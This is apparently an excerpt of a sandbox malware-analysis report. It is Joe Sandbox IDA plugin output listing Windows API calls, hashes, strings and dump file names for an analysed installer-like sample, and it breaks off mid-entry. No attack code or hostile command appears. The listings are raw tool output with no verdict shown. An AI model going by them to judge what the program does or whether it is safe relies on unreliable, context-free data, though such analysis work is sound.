                                                                              • Opcode ID: d728472e8339f2ffff8a63abc478e5e6a1fb2f9fde307aaa74d21bec7cd435e2
                                                                              • Instruction ID: 6bc70aa2ebf4dd36f12f6c88582c327b68e43ec59fad8d4ed568611576548916
                                                                              • Opcode Fuzzy Hash: d728472e8339f2ffff8a63abc478e5e6a1fb2f9fde307aaa74d21bec7cd435e2
                                                                              • Instruction Fuzzy Hash: 05D0C7D3351733566D9071FB3CC19AB018C8A116B53540177F500F6141D99DCC4115AD
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00497107,00000001,00000000,0049712B), ref: 00496E36
                                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00496E3C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                              • API String ID: 1646373207-834958232
                                                                              • Opcode ID: d6cd7607be6575f9249c3beb1cc04364ec349a9d743fe925dab93869ddeda9f1
                                                                              • Instruction ID: 4607b44a290c0083fd8a3bbebdee3b5c85a8181a3f50ff176a2b10a78ee17b7d
                                                                              • Opcode Fuzzy Hash: d6cd7607be6575f9249c3beb1cc04364ec349a9d743fe925dab93869ddeda9f1
                                                                              • Instruction Fuzzy Hash: 0BB012CA68170450CC1032F28C07E1F1C0C4C80769B1604373C00F10C3CF6CD800483E
                                                                              APIs
                                                                                • Part of subcall function 0044AEAC: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044EFC9,004970B6), ref: 0044AED3
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AEEB
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AEFD
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF0F
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF21
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF33
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF45
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF57
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AF69
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AF7B
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AF8D
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AF9F
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFB1
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044AFC3
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044AFD5
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044AFE7
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044AFF9
                                                                                • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B00B
                                                                              • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004970D9), ref: 00463D2B
                                                                              • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00463D31
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoad
                                                                              • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                              • API String ID: 2238633743-2683653824
                                                                              • Opcode ID: cec96aa5f796286b6b1f0dc5ec591c4641b52a537a2fc1f69b6a30b1eceec279
                                                                              • Instruction ID: dcd617acd20af11e442c32675adda2be3f923d80830e775180bb661fb25f4313
                                                                              • Opcode Fuzzy Hash: cec96aa5f796286b6b1f0dc5ec591c4641b52a537a2fc1f69b6a30b1eceec279
                                                                              • Instruction Fuzzy Hash: 67B092A0A80780A8DE10BFB3A84390B28248590B1AB20443B30207A093EB7C45145E6F
                                                                              APIs
                                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,0047C3E4,?,?,?,?,00000000,0047C539,?,00000000,0000003C,00000000,?,0047C68D), ref: 0047C3C0
                                                                              • FindClose.KERNEL32(000000FF,0047C3EB,0047C3E4,?,?,?,?,00000000,0047C539,?,00000000,0000003C,00000000,?,0047C68D,00000000), ref: 0047C3DE
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileNext
                                                                              • String ID:
                                                                              • API String ID: 2066263336-0
                                                                              • Opcode ID: c8920c4e496049598e8e4d691bd77c9b57a1904a5ea7081e96ee31db71d01ce9
                                                                              • Instruction ID: ee88cb3e7f5f0e7034babd07dab097b82f9cbcdb14299ae6248908863b530e43
                                                                              • Opcode Fuzzy Hash: c8920c4e496049598e8e4d691bd77c9b57a1904a5ea7081e96ee31db71d01ce9
                                                                              • Instruction Fuzzy Hash: 5981317090025DAFCF11DFA5CC91ADFBBB9EF49304F5084AAE808A7291D7399A46CF54
                                                                              APIs
                                                                                • Part of subcall function 0042ECA4: GetTickCount.KERNEL32 ref: 0042ECAA
                                                                                • Part of subcall function 0042EAFC: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042EB31
                                                                              • GetLastError.KERNEL32(00000000,004746A1,?,?,0049B178,00000000), ref: 0047458A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CountErrorFileLastMoveTick
                                                                              • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                              • API String ID: 2406187244-2685451598
                                                                              • Opcode ID: efc54fff5a2ae185733b88f25fecc7f4665324125684443dd4ac39fac187bdd2
                                                                              • Instruction ID: 473eb97c6ec8267434c8776fb474a14b66813a9beba34573b5150fcc090343b6
                                                                              • Opcode Fuzzy Hash: efc54fff5a2ae185733b88f25fecc7f4665324125684443dd4ac39fac187bdd2
                                                                              • Instruction Fuzzy Hash: 79416370A002099FCB10EFA5D882AEE77B4EF89314F518537E504B7395D73C9A05CBA9
                                                                              APIs
                                                                              • GetDesktopWindow.USER32 ref: 00413D56
                                                                              • GetDesktopWindow.USER32 ref: 00413E0E
                                                                                • Part of subcall function 00418ED0: 6F59C6F0.COMCTL32(?,00000000,00413FD3,00000000,004140E3,?,?,0049A628), ref: 00418EEC
                                                                                • Part of subcall function 00418ED0: ShowCursor.USER32(00000001,?,00000000,00413FD3,00000000,004140E3,?,?,0049A628), ref: 00418F09
                                                                              • SetCursor.USER32(00000000,?,?,?,?,00413B03,00000000,00413B16), ref: 00413E4C
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CursorDesktopWindow$Show
                                                                              • String ID:
                                                                              • API String ID: 2074268717-0
                                                                              • Opcode ID: bdf797e27c36325bb8c82eddb0fe25cd735ab4185a90c7389a74a707800caf49
                                                                              • Instruction ID: b367783c8e347dee620bf4ebb942fef05e7de29136c442ebf2d1f3a12f6593d4
                                                                              • Opcode Fuzzy Hash: bdf797e27c36325bb8c82eddb0fe25cd735ab4185a90c7389a74a707800caf49
                                                                              • Instruction Fuzzy Hash: 14415C75700250AFCB10EF39E984B9677E1AB64325F16807BE404CB365DA38ED91CF9A
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A7D
                                                                              • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AEC
                                                                              • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B87
                                                                              • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BC6
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: LoadString$FileMessageModuleName
                                                                              • String ID:
                                                                              • API String ID: 704749118-0
                                                                              • Opcode ID: e5f82f84354ef0ca283ae45606e551eda4c159cf8a0135734a08b6be587c5a6c
                                                                              • Instruction ID: 4dc4f8fa8e31f5a504acc487101d04bf7196a45c85b280592f63b9c2e46bb1d6
                                                                              • Opcode Fuzzy Hash: e5f82f84354ef0ca283ae45606e551eda4c159cf8a0135734a08b6be587c5a6c
                                                                              • Instruction Fuzzy Hash: 933154706083849EE330EB65C945BDB77E89B86304F40483FB6C8D72D1DB79A9088767
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E161
                                                                                • Part of subcall function 0044C7A4: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044C7D6
                                                                              • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E1E5
                                                                                • Part of subcall function 0042BBC4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBD8
                                                                              • IsRectEmpty.USER32(?), ref: 0044E1A7
                                                                              • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E1CA
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                              • String ID:
                                                                              • API String ID: 855768636-0
                                                                              • Opcode ID: 9a7a18137ec586f3ae39864321f244483684a0ffa01bccee3b65953e1ffa7791
                                                                              • Instruction ID: 2ff42263b9fd8d0bf3ebcb41181b8f96e25d68336b74147511caae446a0df0b7
                                                                              • Opcode Fuzzy Hash: 9a7a18137ec586f3ae39864321f244483684a0ffa01bccee3b65953e1ffa7791
                                                                              • Instruction Fuzzy Hash: A8114A72B4030127E310BA7E9C86B5B76899B88748F05483FB506EB383DEB9DC094399
                                                                              APIs
                                                                              • OffsetRect.USER32(?,?,00000000), ref: 00493DE8
                                                                              • OffsetRect.USER32(?,00000000,?), ref: 00493E03
                                                                              • OffsetRect.USER32(?,?,00000000), ref: 00493E1D
                                                                              • OffsetRect.USER32(?,00000000,?), ref: 00493E38
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: OffsetRect
                                                                              • String ID:
                                                                              • API String ID: 177026234-0
                                                                              • Opcode ID: cfbccf1d698e82d79065cf95299db1547cf674505700e5d727bb5bb08f6f6c11
                                                                              • Instruction ID: 626cbd3239d4ed1d666785e4d5506dc5f63added092c4cfac4a9a75855a5826e
                                                                              • Opcode Fuzzy Hash: cfbccf1d698e82d79065cf95299db1547cf674505700e5d727bb5bb08f6f6c11
                                                                              • Instruction Fuzzy Hash: EF217AB6704201AFD700DE69CD85EABBBEEEBC4304F14CA2AF554C7249D634ED0487A6
                                                                              APIs
                                                                              • GetCursorPos.USER32 ref: 00417270
                                                                              • SetCursor.USER32(00000000), ref: 004172B3
                                                                              • GetLastActivePopup.USER32(?), ref: 004172DD
                                                                              • GetForegroundWindow.USER32(?), ref: 004172E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                              • String ID:
                                                                              • API String ID: 1959210111-0
                                                                              • Opcode ID: 8d64426bf1faa67f7e63d5b49e58984f19945b6ec6e4dfcc44bb455274275b92
                                                                              • Instruction ID: d42235d32f12bbd537443306c781531a61dc82822ae97907460fdfc4b9dfd860
                                                                              • Opcode Fuzzy Hash: 8d64426bf1faa67f7e63d5b49e58984f19945b6ec6e4dfcc44bb455274275b92
                                                                              • Instruction Fuzzy Hash: E02183313086018BCB20EB69D885AD773B1AB44758F4545ABF895CB352D73DDC82CB89
                                                                              APIs
                                                                              • MulDiv.KERNEL32(?,00000008,?), ref: 00493A51
                                                                              • MulDiv.KERNEL32(?,00000008,?), ref: 00493A65
                                                                              • MulDiv.KERNEL32(?,00000008,?), ref: 00493A79
                                                                              • MulDiv.KERNEL32(?,00000008,?), ref: 00493A97
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                              • Instruction ID: 4fded1b76b16cf5233eb9f491647a43cf70802087f48ea21bc09c20ce05eabc8
                                                                              • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                              • Instruction Fuzzy Hash: D011FE72604204ABCB40DEA9D8C4D9B7BECEF4D364B1541AAF918DB246D674ED408BA8
                                                                              APIs
                                                                              • GetClassInfoA.USER32(00400000,0041F480,?), ref: 0041F4B1
                                                                              • UnregisterClassA.USER32(0041F480,00400000), ref: 0041F4DA
                                                                              • RegisterClassA.USER32(00498598), ref: 0041F4E4
                                                                              • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F51F
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                              • String ID:
                                                                              • API String ID: 4025006896-0
                                                                              • Opcode ID: 9da16f95b0ca95f6f98f2aa1ee6ab2fa4b74d09379c763118f1aaf581a933dc1
                                                                              • Instruction ID: 3ade520867520f28231aed23d56b060c1ae6e85fc3aaaf2b039856689379b016
                                                                              • Opcode Fuzzy Hash: 9da16f95b0ca95f6f98f2aa1ee6ab2fa4b74d09379c763118f1aaf581a933dc1
                                                                              • Instruction Fuzzy Hash: 600152B12401047BCB10EF6DED81E9B37999769314B11413BBA05E72E1DA3A9C194BAD
                                                                              APIs
                                                                              • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D227
                                                                              • LoadResource.KERNEL32(00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047B574,0000000A,REGDLL_EXE), ref: 0040D241
                                                                              • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047B574), ref: 0040D25B
                                                                              • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?), ref: 0040D265
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                              • String ID:
                                                                              • API String ID: 3473537107-0
                                                                              • Opcode ID: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
                                                                              • Instruction ID: 8b55825d53d46818f15098a3aa340eb6897fe62b828c159971ec5f2842f97e2f
                                                                              • Opcode Fuzzy Hash: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
                                                                              • Instruction Fuzzy Hash: ADF062736046046F8704EE9DA881D5B77ECDE88364310017FF908EB246DA38DD018B78
                                                                              APIs
                                                                              • GetLastError.KERNEL32(00000000,00000000), ref: 0046EE29
                                                                              Strings
                                                                              • Unsetting NTFS compression on directory: %s, xrefs: 0046EE0F
                                                                              • Setting NTFS compression on directory: %s, xrefs: 0046EDF7
                                                                              • Failed to set NTFS compression state (%d)., xrefs: 0046EE3A
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast
                                                                              • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                              • API String ID: 1452528299-1392080489
                                                                              • Opcode ID: 69acb3433b7424efc8733916a2e3fd5d2b01e13f314b1d1949af057b0dba6a86
                                                                              • Instruction ID: 1e7f5b79b7b83b0710ae0b74761658cb8013dc9fe861025df3af78f0f88b0ad9
                                                                              • Opcode Fuzzy Hash: 69acb3433b7424efc8733916a2e3fd5d2b01e13f314b1d1949af057b0dba6a86
                                                                              • Instruction Fuzzy Hash: B1016734E0824856CF04D7EEA0412DDBBE49F09314F4485EFA855DB383EB7A0A0987AB
                                                                              APIs
                                                                                • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                              • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045AECE,?,?,?,?,?,00000000,0045AEF5), ref: 004552F4
                                                                              • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045AECE,?,?,?,?,?,00000000), ref: 004552FD
                                                                              • RemoveFontResourceA.GDI32(00000000), ref: 0045530A
                                                                              • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0045531E
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                              • String ID:
                                                                              • API String ID: 4283692357-0
                                                                              • Opcode ID: 697a476951aa0a0ca9570e552bc061f69c865505889b6d894dbdf5d1e046680c
                                                                              • Instruction ID: 219cbfe3a978a329188234ed78272d854ba8405160bd4c7ea72be768510c46b8
                                                                              • Opcode Fuzzy Hash: 697a476951aa0a0ca9570e552bc061f69c865505889b6d894dbdf5d1e046680c
                                                                              • Instruction Fuzzy Hash: A3F05EB574070036EA10B6B69C87F2F268C9F98746F10483BBA04EF2C3D97CD804562D
                                                                              APIs
                                                                              • GetLastError.KERNEL32(0000003C,00000000), ref: 0046F5D5
                                                                              Strings
                                                                              • Unsetting NTFS compression on file: %s, xrefs: 0046F5BB
                                                                              • Setting NTFS compression on file: %s, xrefs: 0046F5A3
                                                                              • Failed to set NTFS compression state (%d)., xrefs: 0046F5E6
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
